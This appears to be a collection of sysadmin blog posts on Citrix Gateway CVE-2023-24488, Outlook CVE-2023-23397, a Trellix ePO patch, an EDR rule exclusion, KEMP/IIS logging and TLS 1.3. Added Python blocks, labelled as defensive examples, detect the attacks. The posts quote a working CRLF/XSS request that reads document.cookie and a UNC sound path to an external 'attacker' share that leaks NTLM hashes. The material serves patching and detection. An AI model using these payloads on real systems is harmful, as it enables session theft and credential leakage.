02.07.2023, CITRIX 0-DAY, Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)

by butsch 2. July 2023 23:42

02.07.2023

An attacker is able to change the redirect of the LOGOUT page. To date we are unsure whether this only applies if you use SAML, as in the November 2022 exploit.

GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1

Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)

The URL query parameters are not sufficiently sanitized before they are inserted into the HTTP Location header. An attacker can exploit this to craft a link that, when clicked, redirects the victim to an arbitrary location. Alternatively, the attacker can insert line-break characters into the Location header to terminate the HTTP headers early and inject an XSS payload into the response body.

Impact
An attacker can craft malicious links that, when clicked, either redirect the victim to a website under the attacker's control or execute JavaScript in the victim's browser.
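As an added defensive example (not from the original post and not Citrix code), the following Python shows the two checks a gateway has to apply to post_logout_redirect_uri before reflecting it into Location, plus a triage routine that flags request lines abusing the parameter in the way described above. The allow-listed hosts and the sample request lines are constructed for this example.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts a post-logout redirect may legitimately target (constructed for this example).
ALLOWED_REDIRECT_HOSTS = {"gateway.example.internal", "portal.example.internal"}

LOGOUT_PATH = "/oauth/idp/logout"
PARAM = "post_logout_redirect_uri"


def is_safe_post_logout_redirect(value, allowed_hosts=ALLOWED_REDIRECT_HOSTS):
    """Decide whether a post_logout_redirect_uri value may be copied into Location.

    Two independent checks cover the two halves of CVE-2023-24488:
    - control characters are rejected outright (CR/LF would terminate the
      header block, so whatever follows lands in the response body);
    - absolute URLs must be https and point at an allow-listed host, which
      closes the open-redirect variant; same-origin relative paths are accepted.
    """
    decoded = unquote(value)  # validate the decoded form, not the encoded one
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return False
    parts = urlsplit(decoded)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: a single-slash absolute path on this host only.
        return decoded.startswith("/") and not decoded.startswith("//") and "\\" not in decoded
    return parts.scheme == "https" and parts.hostname in allowed_hosts


def triage_request_line(line):
    """Return a reason if a request line abuses the logout redirect, else None.

    Expects an HTTP request line: METHOD TARGET VERSION.
    """
    tokens = line.split(" ", 2)
    if len(tokens) < 2:
        return None
    parts = urlsplit(tokens[1])
    if parts.path != LOGOUT_PATH:
        return None
    # parse_qs percent-decodes, so %0d%0a shows up here as a real CR/LF pair.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if "\r" in value or "\n" in value:
            return "CRLF in %s (header injection / XSS)" % PARAM
        if not is_safe_post_logout_redirect(value):
            return "%s points off the allow list (open redirect)" % PARAM
    return None


def scan_request_lines(lines):
    """Run the triage over many lines; returns [(line_index, reason), ...]."""
    hits = []
    for index, line in enumerate(lines):
        reason = triage_request_line(line)
        if reason:
            hits.append((index, reason))
    return hits


# Constructed sample request lines; the second is the request quoted in the post above.
SAMPLE_REQUEST_LINES = [
    "GET /oauth/idp/logout?post_logout_redirect_uri=/vpn/index.html HTTP/1.1",
    "GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1",
    "GET /oauth/idp/logout?post_logout_redirect_uri=https://attacker.example/landing HTTP/1.1",
    "GET /vpn/index.html HTTP/1.1",
]

if __name__ == "__main__":
    for index, reason in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(index, reason, "<-", SAMPLE_REQUEST_LINES[index])
```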

Affected software
The following versions are affected by this vulnerability:

Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
Citrix ADC 12.1-FIPS before 12.1-55.296
Citrix ADC 12.1-NDcPP before 12.1-55.296

Product description
Citrix Gateway is a network appliance that provides various functions, including remote-access VPN services.

Solution
Update to the latest version of Citrix Gateway.

LINK CITRIX:

Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-24487, CVE-2023-24488

https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488

From the Citrix bulletin (translated):

Applicable products
Citrix ADC, Citrix Gateway
Description of the problem
Vulnerabilities have been discovered in the Citrix ADC and Citrix Gateway versions listed below which, if exploited, could lead to the following security issues:

Affected products, versions and components
The following supported versions of Citrix ADC and Citrix Gateway are affected by this vulnerability:

Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
Citrix ADC 12.1-FIPS before 12.1-55.296
Citrix ADC 12.1-NDcPP before 12.1-55.296

This bulletin only applies to customer-managed Citrix ADC and Citrix Gateway installations. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

CVE ID | Description | Prerequisites | CWE | CVSS
CVE-2023-24488 | Cross-site scripting | Appliance must be configured as a gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) or an AAA virtual server | CWE-79 | 6.1
CVE-2023-24487 | Arbitrary file read | Access to NSIP or SNIP with access to the management interface | CWE-253 | 6.3

What customers should do
Affected Citrix ADC and Citrix Gateway customers should install the relevant updated versions of Citrix ADC or Citrix Gateway as soon as possible:

Citrix ADC and Citrix Gateway 13.1-45.61 and later releases
Citrix ADC and Citrix Gateway 13.0-90.11 and later releases of 13.0
Citrix ADC and Citrix Gateway 12.1-65.35 and later releases of 12.1
Citrix ADC 12.1-FIPS 12.1-55.296 and later releases of 12.1-FIPS
Citrix ADC 13.1-FIPS 13.1-37.150 and later releases of 13.1-FIPS
Citrix ADC 12.1-NDcPP 12.1-55.296 and later releases of 12.1-NDcPP

Acknowledgements
Citrix thanks Petr Juhanak of Accenture, Dylan Pindur of Assetnote and Wisdomtree of the Ant Group Digital Financial Security Team for working together to protect Citrix customers.

What Citrix is doing
Citrix is notifying customers and channel partners about this potential security issue by publishing this security bulletin in the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.

Obtaining support on this issue
If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at https://www.citrix.com/support/open-a-support-case.

The official Citrix security bulletin can be found here.

Tags:

IT | Hotfixes / Updates | SECURITY

Mcafee/Trellix EPO 5.10.0 Service Pack Repost 1, 4098, fails to install and rollback

by butsch 7. June 2023 15:15

Update to 5.10.0 Service Pack 1 BUILD 4098

There is an issue with EPO 5.10.0 Service Pack 1 RE-Post.

We have seen some EPO 5.10.0 Service Pack 1 installations go through smoothly and some larger EPO installations fail. Trellix forum member CDINET posted a tip on how to install it successfully.

Here is how to get the update through. Worse, the MSI installer rollback does not work and leaves the EPO in a non-working state. So it is important to have a hypervisor snapshot as fallback, or a Veeam backup, in case this fails.

Make sure you install all pre-SP1 updates up to "ePO_5.10.0_Update_15" (these are additional steps; we assume you ARE already at Update 15 level for the SP1). Please see the Trellix KB on how to get to that Update 15 patch level.

Process to patch EPO 5.10 from 5.10 UP15 to the latest Service Pack 1 successfully:

  • Back up everything you have, because there is a high chance this will fail. It's a re-posted patch that they already pulled once.
  • Turn off/shut down all McAfee/Trellix machines you have (EPO, DXL, Broker, TIE etc.)
  • Log on to the TIE and DXL broker console or SSH and use "shutdown -f 1"
  • Take a VM snapshot for disaster fallback. The snapshots should be taken powered OFF and at the same time because of DXL (if you use DXL)
  • Start all VMs
  • On the EPO server, disable the two WMI-related services
  • Reboot the EPO server
  • Installing SP1 will now succeed
  • Change the two WMI services back as seen in the screenshot

Services before:

change to:

Reboot once

Check events

Change the services back to how they were before

Services before:

If you want to be 100% sure, check the logs

trail

2023-06-07T10:54:26.226Z - info: Executed batch sql scripts for snapshot

2023-06-07T10:54:26.262Z - info: Successfully got connection

2023-06-07T10:54:26.266Z - info: Successfully got connection

2023-06-07T10:54:26.276Z - info: Successfully got connection

2023-06-07T10:54:26.290Z - info: Successfully got connection

2023-06-07T10:54:26.302Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/simagent64.exe'

2023-06-07T10:54:26.302Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.303Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/eposignle.exe'

2023-06-07T10:54:26.303Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.315Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/simagent.exe'

2023-06-07T10:54:26.315Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.317Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/eposignse.exe'

2023-06-07T10:54:26.317Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:44.004Z - info: Service EPOEVENTPARSERSRV status is started

2023-06-07T10:54:55.599Z - error: Service start error :Error: Timed out attempting to start EPOAHAPACHESRV.

2023-06-07T10:54:55.709Z - error: Service start error :Error: Timed out attempting to start EPOAHAPACHESRV.

2023-06-07T10:55:05.723Z - info: Service EPOTOMCATSRV5100 status is started

2023-06-07T10:55:05.821Z - info: Determining if service EPOAHAPACHESRV is started or not

2023-06-07T10:55:16.299Z - info: Service EPOAHAPACHESRV status is started

Tags:

SECURITY | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

M365, Exchange Online Remote Powershell blocked by T1056 Mitre Trellix

by butsch 4. April 2023 03:00

Trellix ENS 10.X, T1056 - Key capture using Powershell detected, Host intrusion buffer overflow

ExP:Illegal API Use Blocked an attempt to exploit

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE, which targeted the GetAsyncKeyState API.

Hello,

If you want to manage M365 / Exchange Online there are several ways. You can use the PS button within the admin portal, but then you need an Azure licence for a separate account you created for IT.

We also tried the remote shell to M365 on several servers and working clients and found an important fact.

Most antivirus solutions that do more than others and that reflect MITRE rules catch the connection as a phishing attack for credentials, as defined in MITRE T1056 (keylogger). So you will have to exclude the machines where IT people use the remote shell and are asked for credentials via the pop-up GUI (not passing the password in the CLI command).

https://learn.microsoft.com/en-us/powershell/exchange/connect-to-exchange-online-powershell?view=exchange-ps

Install-Module -Name ExchangeOnlineManagement -Force

Connect-ExchangeOnline

You can find and also exclude the API function call in Trellix EPO like this. I would like to state that you should only exclude T1056 on machines where the Exchange admin will work.

Select the EXPLOIT checkbox, then at the bottom of the page on the left side, ADD Exclusion

Choose the POLICY you have for the clients for which you want to change this single false positive

Again, it would be best NOT to exclude that MITRE rule for all end users, just for the IT machines.

Since McAfee/Trellix ENS you can define POLICIES for all (broad range) and then add more fine-grained policies on top for some machines or targets (like we know from Windows GPO with WMI filters)

T1056

Threat Target Process Name:    POWERSHELL.EXE

Threat Target File Path:    C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

Event Category:    Host intrusion buffer overflow

Event ID:    18054

Threat Severity:    Critical

Threat Name:    ExP:Illegal API Use

Threat Type:    Exploit Prevention

Action Taken:    Blocked

Threat Handled:    True

Analyzer Detection Method:    Exploit Prevention

Location:    

Module Name:    Threat Prevention

Analyzer Technology Version:    

Analyzer Content Creation Date:    3/6/23 10:06:04 PM CET

Analyzer Content Version:    10.6.0.12731

AMCore Content Version:    

Analyzer Rule ID:    6183

Analyzer Rule Name:    T1056 - Key capture using Powershell detected

If you want to disable the 6183 analyzer rule completely, you can do it here in your POLICY.

To see it you have to choose "OTHERS". By default this rule may not be ON in your McAfee/Trellix environment (out of the box).

After the change the connection should work:

Tags:

Exchange 2013 | Exchange 2016 | Exchange 2019 | M365/AZURE | SECURITY | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

CVE-2023-23397, Outlook.exe exploit, PidLIDReminder custom sound from SMB for appointment reminders

by butsch 15. March 2023 03:00

CVE-2023-23397, what is exploited:

Instead of the standard Microsoft Outlook sound you can specify a custom sound for a meeting reminder. This sound can sit on a share. That's where the problem lies.

https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property

https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e

CVE-2023-23397 is an Outlook bug. If you send an incoming e-mail for an appointment with a custom reminder (sound, attribute PidLIDReminder), Outlook.exe (2013/2016) will try to fetch the sound file via SMB, even from an external share (without regard to the site zones in IE/Edge/system). If port 445 to that destination is open, the system sends an NTLM hash outside your network. As we understand it, most existing AV solutions for on-premise Exchange currently cannot scan this PidLIDReminder attribute (Trend, Trellix Security for Exchange). That is why the MS Exchange team provided the script.

Here you can specify a custom sound for an APPOINTMENT.

E.g. alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"

PRIO1

is to install the Outlook.exe patch and restart the clients, and also to make sure that customers do not open SMB for external connections. This is usually closed from client VLAN > WAN. The tricky ones are home office and remote workers who, depending on split VPN, would have 445/SMB open.
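An added hunting helper in Python (not part of the post and not the Microsoft script): it classifies the reminder sound path stored on a calendar item, the PidLidReminderFileParameter value that the Microsoft script inspects, so that items pointing at a UNC path outside the private address ranges stand out for review. The internal DNS suffixes and the sample items are constructed assumptions; cal-0003 uses the path quoted above.

```python
import ipaddress
import re

# DNS suffixes treated as internal for this example (constructed; use your own AD/DNS zones).
INTERNAL_DNS_SUFFIXES = (".corp.example", ".example.internal")

# Address ranges that never leave the site: RFC 1918, link-local, loopback and their IPv6 kin.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8",
    "fc00::/7", "fe80::/10", "::1/128",
)]

# Matches \\host\share..., //host/share... and the long form \\?\UNC\host\share...
_UNC_RE = re.compile(r"^(?:[\\/]{2}\?[\\/]UNC[\\/]|[\\/]{2})([^\\/]+)(?:[\\/].*)?$", re.IGNORECASE)


def unc_host(path):
    """Host part of a UNC path, or None when the value is not a UNC path at all."""
    match = _UNC_RE.match(path.strip())
    return match.group(1) if match else None


def classify_reminder_sound(path):
    """Classify the reminder sound path of a calendar item.

    'local'        drive-letter or relative path; nothing leaves the machine
    'unc-internal' UNC to an internal address range, an internal DNS suffix or a
                   single-label name (those cannot resolve to the Internet on their own)
    'unc-external' UNC to a public address or unknown domain; opening it over SMB
                   would send the user's NTLM response to that host
    """
    host = unc_host(path)
    if host is None:
        return "local"
    host = host.split("@", 1)[0].rstrip(".").lower()  # drop WebDAV-style "@SSL"/"@port" suffixes
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        return "unc-internal" if any(addr in net for net in INTERNAL_NETWORKS) else "unc-external"
    if "." not in host or host.endswith(INTERNAL_DNS_SUFFIXES):
        return "unc-internal"
    return "unc-external"


def find_external_reminders(items):
    """items: iterable of (item_id, sound_path). Returns the ids whose sound lives off-site."""
    return [item_id for item_id, path in items
            if classify_reminder_sound(path) == "unc-external"]


# Constructed sample items; cal-0003 carries the path quoted in the post above.
SAMPLE_ITEMS = [
    ("cal-0001", r"C:\Windows\Media\reminder.wav"),
    ("cal-0002", r"\\fileserver.corp.example\media\chime.wav"),
    ("cal-0003", r"\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"),
    ("cal-0004", r"\\?\UNC\203.0.113.5\media\alert.wav"),
    ("cal-0005", "//10.20.30.40/share/ok.wav"),
]

if __name__ == "__main__":
    for item_id, path in SAMPLE_ITEMS:
        print(item_id, classify_reminder_sound(path))
    print("review:", find_external_reminders(SAMPLE_ITEMS))
```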

 

Patches for Outlook 2013/2016:

https://support.microsoft.com/kb/5002254

2016 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)

2013 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)

 

Manual installation: unpack the CAB files and THEN double-click the .MSP patch file

Deployment outside WSUS: for the .CAB files you can install them from the command line like this:

DISM.EXE does not seem to work for the Office CAB files.

But you can open the file and then simply install the MSP file. Windows Installer looks for and finds the rest, e.g. the source of the Office files.

msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb

msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

DISM.EXE does not seem to work for the Office CAB files.

https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002

dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"

Depending on the system this gives an error because it does not have the underlying CBS package that is required:

Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

Usually with other CAB packages these are included in the CAB/archive; here they are not, e.g. for Outlook 2016 on W11 22H2.

Example file from 202X included: there you first had to install the SSU and then the patch with DISM.

With the current Outlook patch, however, only an MSP is included.

2016/W11

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Processing the top level command token(add-package). - CPackageManagerCLIHandler::Private_ValidateCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Attempting to route to appropriate command handler. - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Routing the command... - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Encountered the option "packagepath" with value "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::Private_GetPackagesFromCommandLine

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed opening package. - CDISMPackageManager::Internal_CreatePackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to open the package at location: "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::ProcessPackagePath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the count of packages from the command line. - CPackageManagerCLIHandler::ProcessCmdLine_AddPackage(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed while processing command add-package. - CPackageManagerCLIHandler::ExecuteCmdLine(hr:0x80070002)

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Further logs for online package and feature related operations can be found at %WINDIR%\logs\CBS\cbs.log - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Error DISM DISM.EXE: DISM Package Manager processed the command line but failed. HRESULT=80070002

 

The patch info from WSUS.

PRIO2

is FORENSICS: finding out whether you have received such e-mails and, hopefully, preventing them from being delivered to Outlook.exe. You can also repair those that have already arrived. If you are on-premise, check whether your Exchange AV solution can look for the attribute (the AV solution for Exchange in itself already has all the rights that you would otherwise have to grant separately to run the script; the only question is WHETHER it finds the attribute with its current version).

 

Important for the PRIO 2 SCRIPT: we recommend this only for people who have experience with such commands, e.g. from integrating an archiving solution or a mobile device management (MDM) solution. You may also need to consult your in-house legal/compliance team, since, as far as I understand, you are granting someone full access to the e-mails of your CEO and board (I have not reviewed the script in detail).

[https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/]

The script does the following:

  • Generate an unlimited (full) throttling policy for a group or a user (such as an MDM master account or an account that feeds a legal archiving solution).
  • Generate a rule so that one user has full access to every e-mail, calendar entry etc. stored in the Exchange environment (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
  • Scan all e-mails, or at least some days backwards; since Ukraine was attacked in 03/2022, so for a year? Or was that information wrong? Microsoft says here that you should scan particularly attractive targets (who are these supposed to be? The CEO/board, or just the user?)

Action required 16.03.2023

Install the patch and make sure everyone has done the reboot

Make sure port 445/SMB is closed from LAN > WAN (possibly adjust the remote worker firewall GPO/policy, or else do it via a firewall module, e.g. from the antivirus, such as McAfee ENS Firewall)

The PowerShell scripts currently circulating are intended solely for forensic purposes and for searching for indicators of compromise. These scripts do, however, require careful handling, since the script user has to be given full access to all resources, including the ability to regulate the script's speed (throttling). Please do not run the script until we can make sure that there are no problems due to language barriers.

It is important to note that the PowerShell script is not necessary to close the Outlook.exe vulnerability. It serves solely for forensic investigation and for replacing the 1-2% of calendar entries that have not yet been updated because of offline connections. It is unlikely, however, that these scripts will be required, since the first wave of the attack came through an e-mail with a blocked attachment (.MSI).

Finally, it is important to emphasise that the Exchange patch from March 2023 has no effect on the Outlook.exe vulnerability.

Image: source ACEResponder/Twitter

Image: source MS Learn

Good blog:

https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (not the source of the info)

Tags:

Hotfixes / Updates | Exchange 2010 | Exchange 2013 | Exchange 2016 | Exchange 2019 | M365/AZURE | SECURITY | SPAM Fortimail

KEMP Load Balancer, Microsoft IIS, How to see Source IP address in Logfiles on Webserver

by butsch 2. February 2023 22:40

 

We once had a case where we were supposed to install the URL Rewrite module in IIS on a CAS 2010 to pass more info to a Rapid7 solution. (This was in the period before all the monthly leaks for 2013/2016/2019 came up and pushed all customers to M365, and it was unclear what the module would do inside Exchange etc.)

We had used URL Rewrite before for web servers at an ISP, but I did not at once like to use it on an IIS where you uninstall the IIS sites and re-install them with an EXE that runs 100 PowerShell scripts.

The CAS were behind a commercial KEMP load balancer HA pair. I just had the same case privately on one of my Windows IIS web servers, where I tunnel through several active components.

SOLUTION: How to see the source IP if your IIS web server is behind a KEMP load balancer.

Schema:

"WAN"-----"FW1"---"FW2"---"KEMP" (back: 192.168.185.105)-----(front: 192.168.151.70)"WEB SERVER/MS/IIS"

Info you have BEFORE in the IIS log files (you do not see the source IP in the IIS log files):

2023-01-21 19:08:35 W3SVC2 web 192.168.185.105 GET /image.axd picture=041014_0945_WSUSWindows1.png 443 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36+Edg/109.0.1518.61 - www.butsch.ch 200 0 0 8644 742 4

Solution: info you have after our change in the IIS log files (source IP at the end):

2023-01-21 19:46:28 W3SVC2 web 192.168.185.105 GET /category/APP-V.aspx - 80 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - - www.butsch.ch 404 0 0 23895 382 12 15.206.212.159

Go onto your KEMP (this also works with the free community version):

Select MODIFY Service; under Advanced Properties change "Add HTTP Headers" to "X-Forwarded-For (No Via)", or try any other option and check in the log files on the IIS side what you see there.

First make sure logging in IIS is installed (if not, install it).

Here is what to change in IIS if you have logging active:

Change the LOGFILE location to a disk where you have space or monitoring.

Add a custom field with source X-Forwarded-For, the header you told the KEMP to include in every request it forwards to the server.

APPLY

Cmd (elevated)

IISRESET

Or restart the server

You will see the source IP at the end of the line:

2023-01-21 19:46:28 W3SVC2 web 192.168.185.105 GET /category/APP-V.aspx - 80 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - - www.butsch.ch 404 0 0 23895 382 12 15.206.212.159
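As an added example in Python (not from the post and not KEMP or IIS code), this parses an IIS W3C log excerpt by its #Fields directive, so the trailing custom field is found by name rather than by position, and recovers the real client address. It goes one step beyond the post: the forwarded header is only believed when c-ip is the KEMP, and the rightmost hop not belonging to a trusted proxy wins, so a header the client inserted itself cannot spoof the result. The trusted-proxy address, the field name X-Forwarded-For and all log lines except the first data line (the "after" line above) are constructed.

```python
import ipaddress

# Only the load balancer may vouch for a client address (assumption: the KEMP as it
# appears in c-ip in the log lines above).
TRUSTED_PROXIES = {ipaddress.ip_address("192.168.151.70")}
XFF_FIELD = "X-Forwarded-For"  # name given to the custom field in IIS logging (assumed)


def parse_w3c_log(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names.

    IIS writes #Software/#Version/#Date/#Fields directive lines ahead of the data;
    the #Fields line says which column is which, so nothing is hard-coded here.
    """
    fields, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("data line before any #Fields directive")
        tokens = line.split(" ")
        if len(tokens) != len(fields):
            raise ValueError("expected %d fields, got %d: %r" % (len(fields), len(tokens), line))
        entries.append(dict(zip(fields, tokens)))
    return entries


def client_ip(entry, trusted_proxies=TRUSTED_PROXIES):
    """Real client address of one entry.

    c-ip is the peer that opened the TCP connection, i.e. the KEMP for requests that
    came through it. The forwarded header is believed only when that peer is a trusted
    proxy, and then the rightmost hop that is not itself a trusted proxy wins: a value
    the client inserted on its own sits further left and cannot spoof the result.
    """
    peer = ipaddress.ip_address(entry["c-ip"])
    raw = entry.get(XFF_FIELD, "-")
    if raw == "-" or peer not in trusted_proxies:
        return peer
    for hop in reversed(raw.split(",")):
        try:
            addr = ipaddress.ip_address(hop.strip(" +"))  # IIS logs spaces as '+'
        except ValueError:
            continue  # malformed hop: skip it rather than trust it
        if addr not in trusted_proxies:
            return addr
    return peer


def requests_per_client(text):
    """Count entries per real client address; returns {ip_string: count}."""
    counts = {}
    for entry in parse_w3c_log(text):
        key = str(client_ip(entry))
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed log excerpt. The first data line is the "after" line from the post; the
# second carries a client-supplied value left of the one the KEMP appended; the third
# reached IIS directly, bypassing the KEMP; the fourth came without the header at all.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-01-21 19:46:28
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken X-Forwarded-For
2023-01-21 19:46:28 W3SVC2 web 192.168.185.105 GET /category/APP-V.aspx - 80 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - - www.butsch.ch 404 0 0 23895 382 12 15.206.212.159
2023-01-21 19:50:02 W3SVC2 web 192.168.185.105 GET /login.aspx - 443 - 192.168.151.70 HTTP/1.1 curl/7.88.1 - - www.butsch.ch 200 0 0 1200 300 2 127.0.0.1,+198.51.100.7
2023-01-21 19:51:10 W3SVC2 web 192.168.185.105 GET /login.aspx - 443 - 198.51.100.9 HTTP/1.1 curl/7.88.1 - - www.butsch.ch 200 0 0 1200 300 2 10.0.0.1
2023-01-21 19:52:44 W3SVC2 web 192.168.185.105 GET /robots.txt - 80 - 192.168.151.70 HTTP/1.1 curl/7.88.1 - - www.butsch.ch 200 0 0 80 120 1 -
"""

if __name__ == "__main__":
    for ip, count in sorted(requests_per_client(SAMPLE_LOG).items()):
        print(ip, count)
```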

 

 

 

 

Tags:

Exchange 2016 | SECURITY | Microsoft Exchange | Microsoft Server OS

Browser TLS 1.3 activated and your Firewall can’t handle it?

by butsch 2. September 2020 17:57

TLS 1.3

https://tools.ietf.org/html/rfc8446

Some modern browsers switch to TLS 1.3 automatically if the web server on the other side supports it, like version 72 of Chrome.exe, or even your OS does, as with Windows 10 build number 20170 upwards (that means the OS itself). So it's all safer and faster?

https://blogs.windows.com/windows-insider/2020/07/15/announcing-windows-10-insider-preview-build-20170/

The problem is that some next-generation web filters (firewalls) can't look into the SSL encryption anymore to find malware/ransomware. With browser self-update mechanisms like in Chrome or Edge Chromium you suddenly have a constellation you did not want. While you approved IE11/Edge updates in WSUS and mostly checked each new release of the browser before releasing it, this has changed.

The interesting point is that some load balancers are also only able to break (deep-inspect) the traffic with really new firmware releases. Customers have demanded that feature since 2017, as we see in various blogs and feature-request portals of the vendors. So if you want to sniff into SSL (break the SSL stream) and your firewall can't handle TLS 1.3 specifically, you currently have a problem.

Checking whether your browser has TLS 1.3 active is easy:

CHROME:

chrome://flags/#tls13-variant (Since Version 72 TLS 1.3 default)

MICROSOFT EDGE CHROMIUM:

edge://flags/

As example Type edge://flags/ in the Browser URL window.

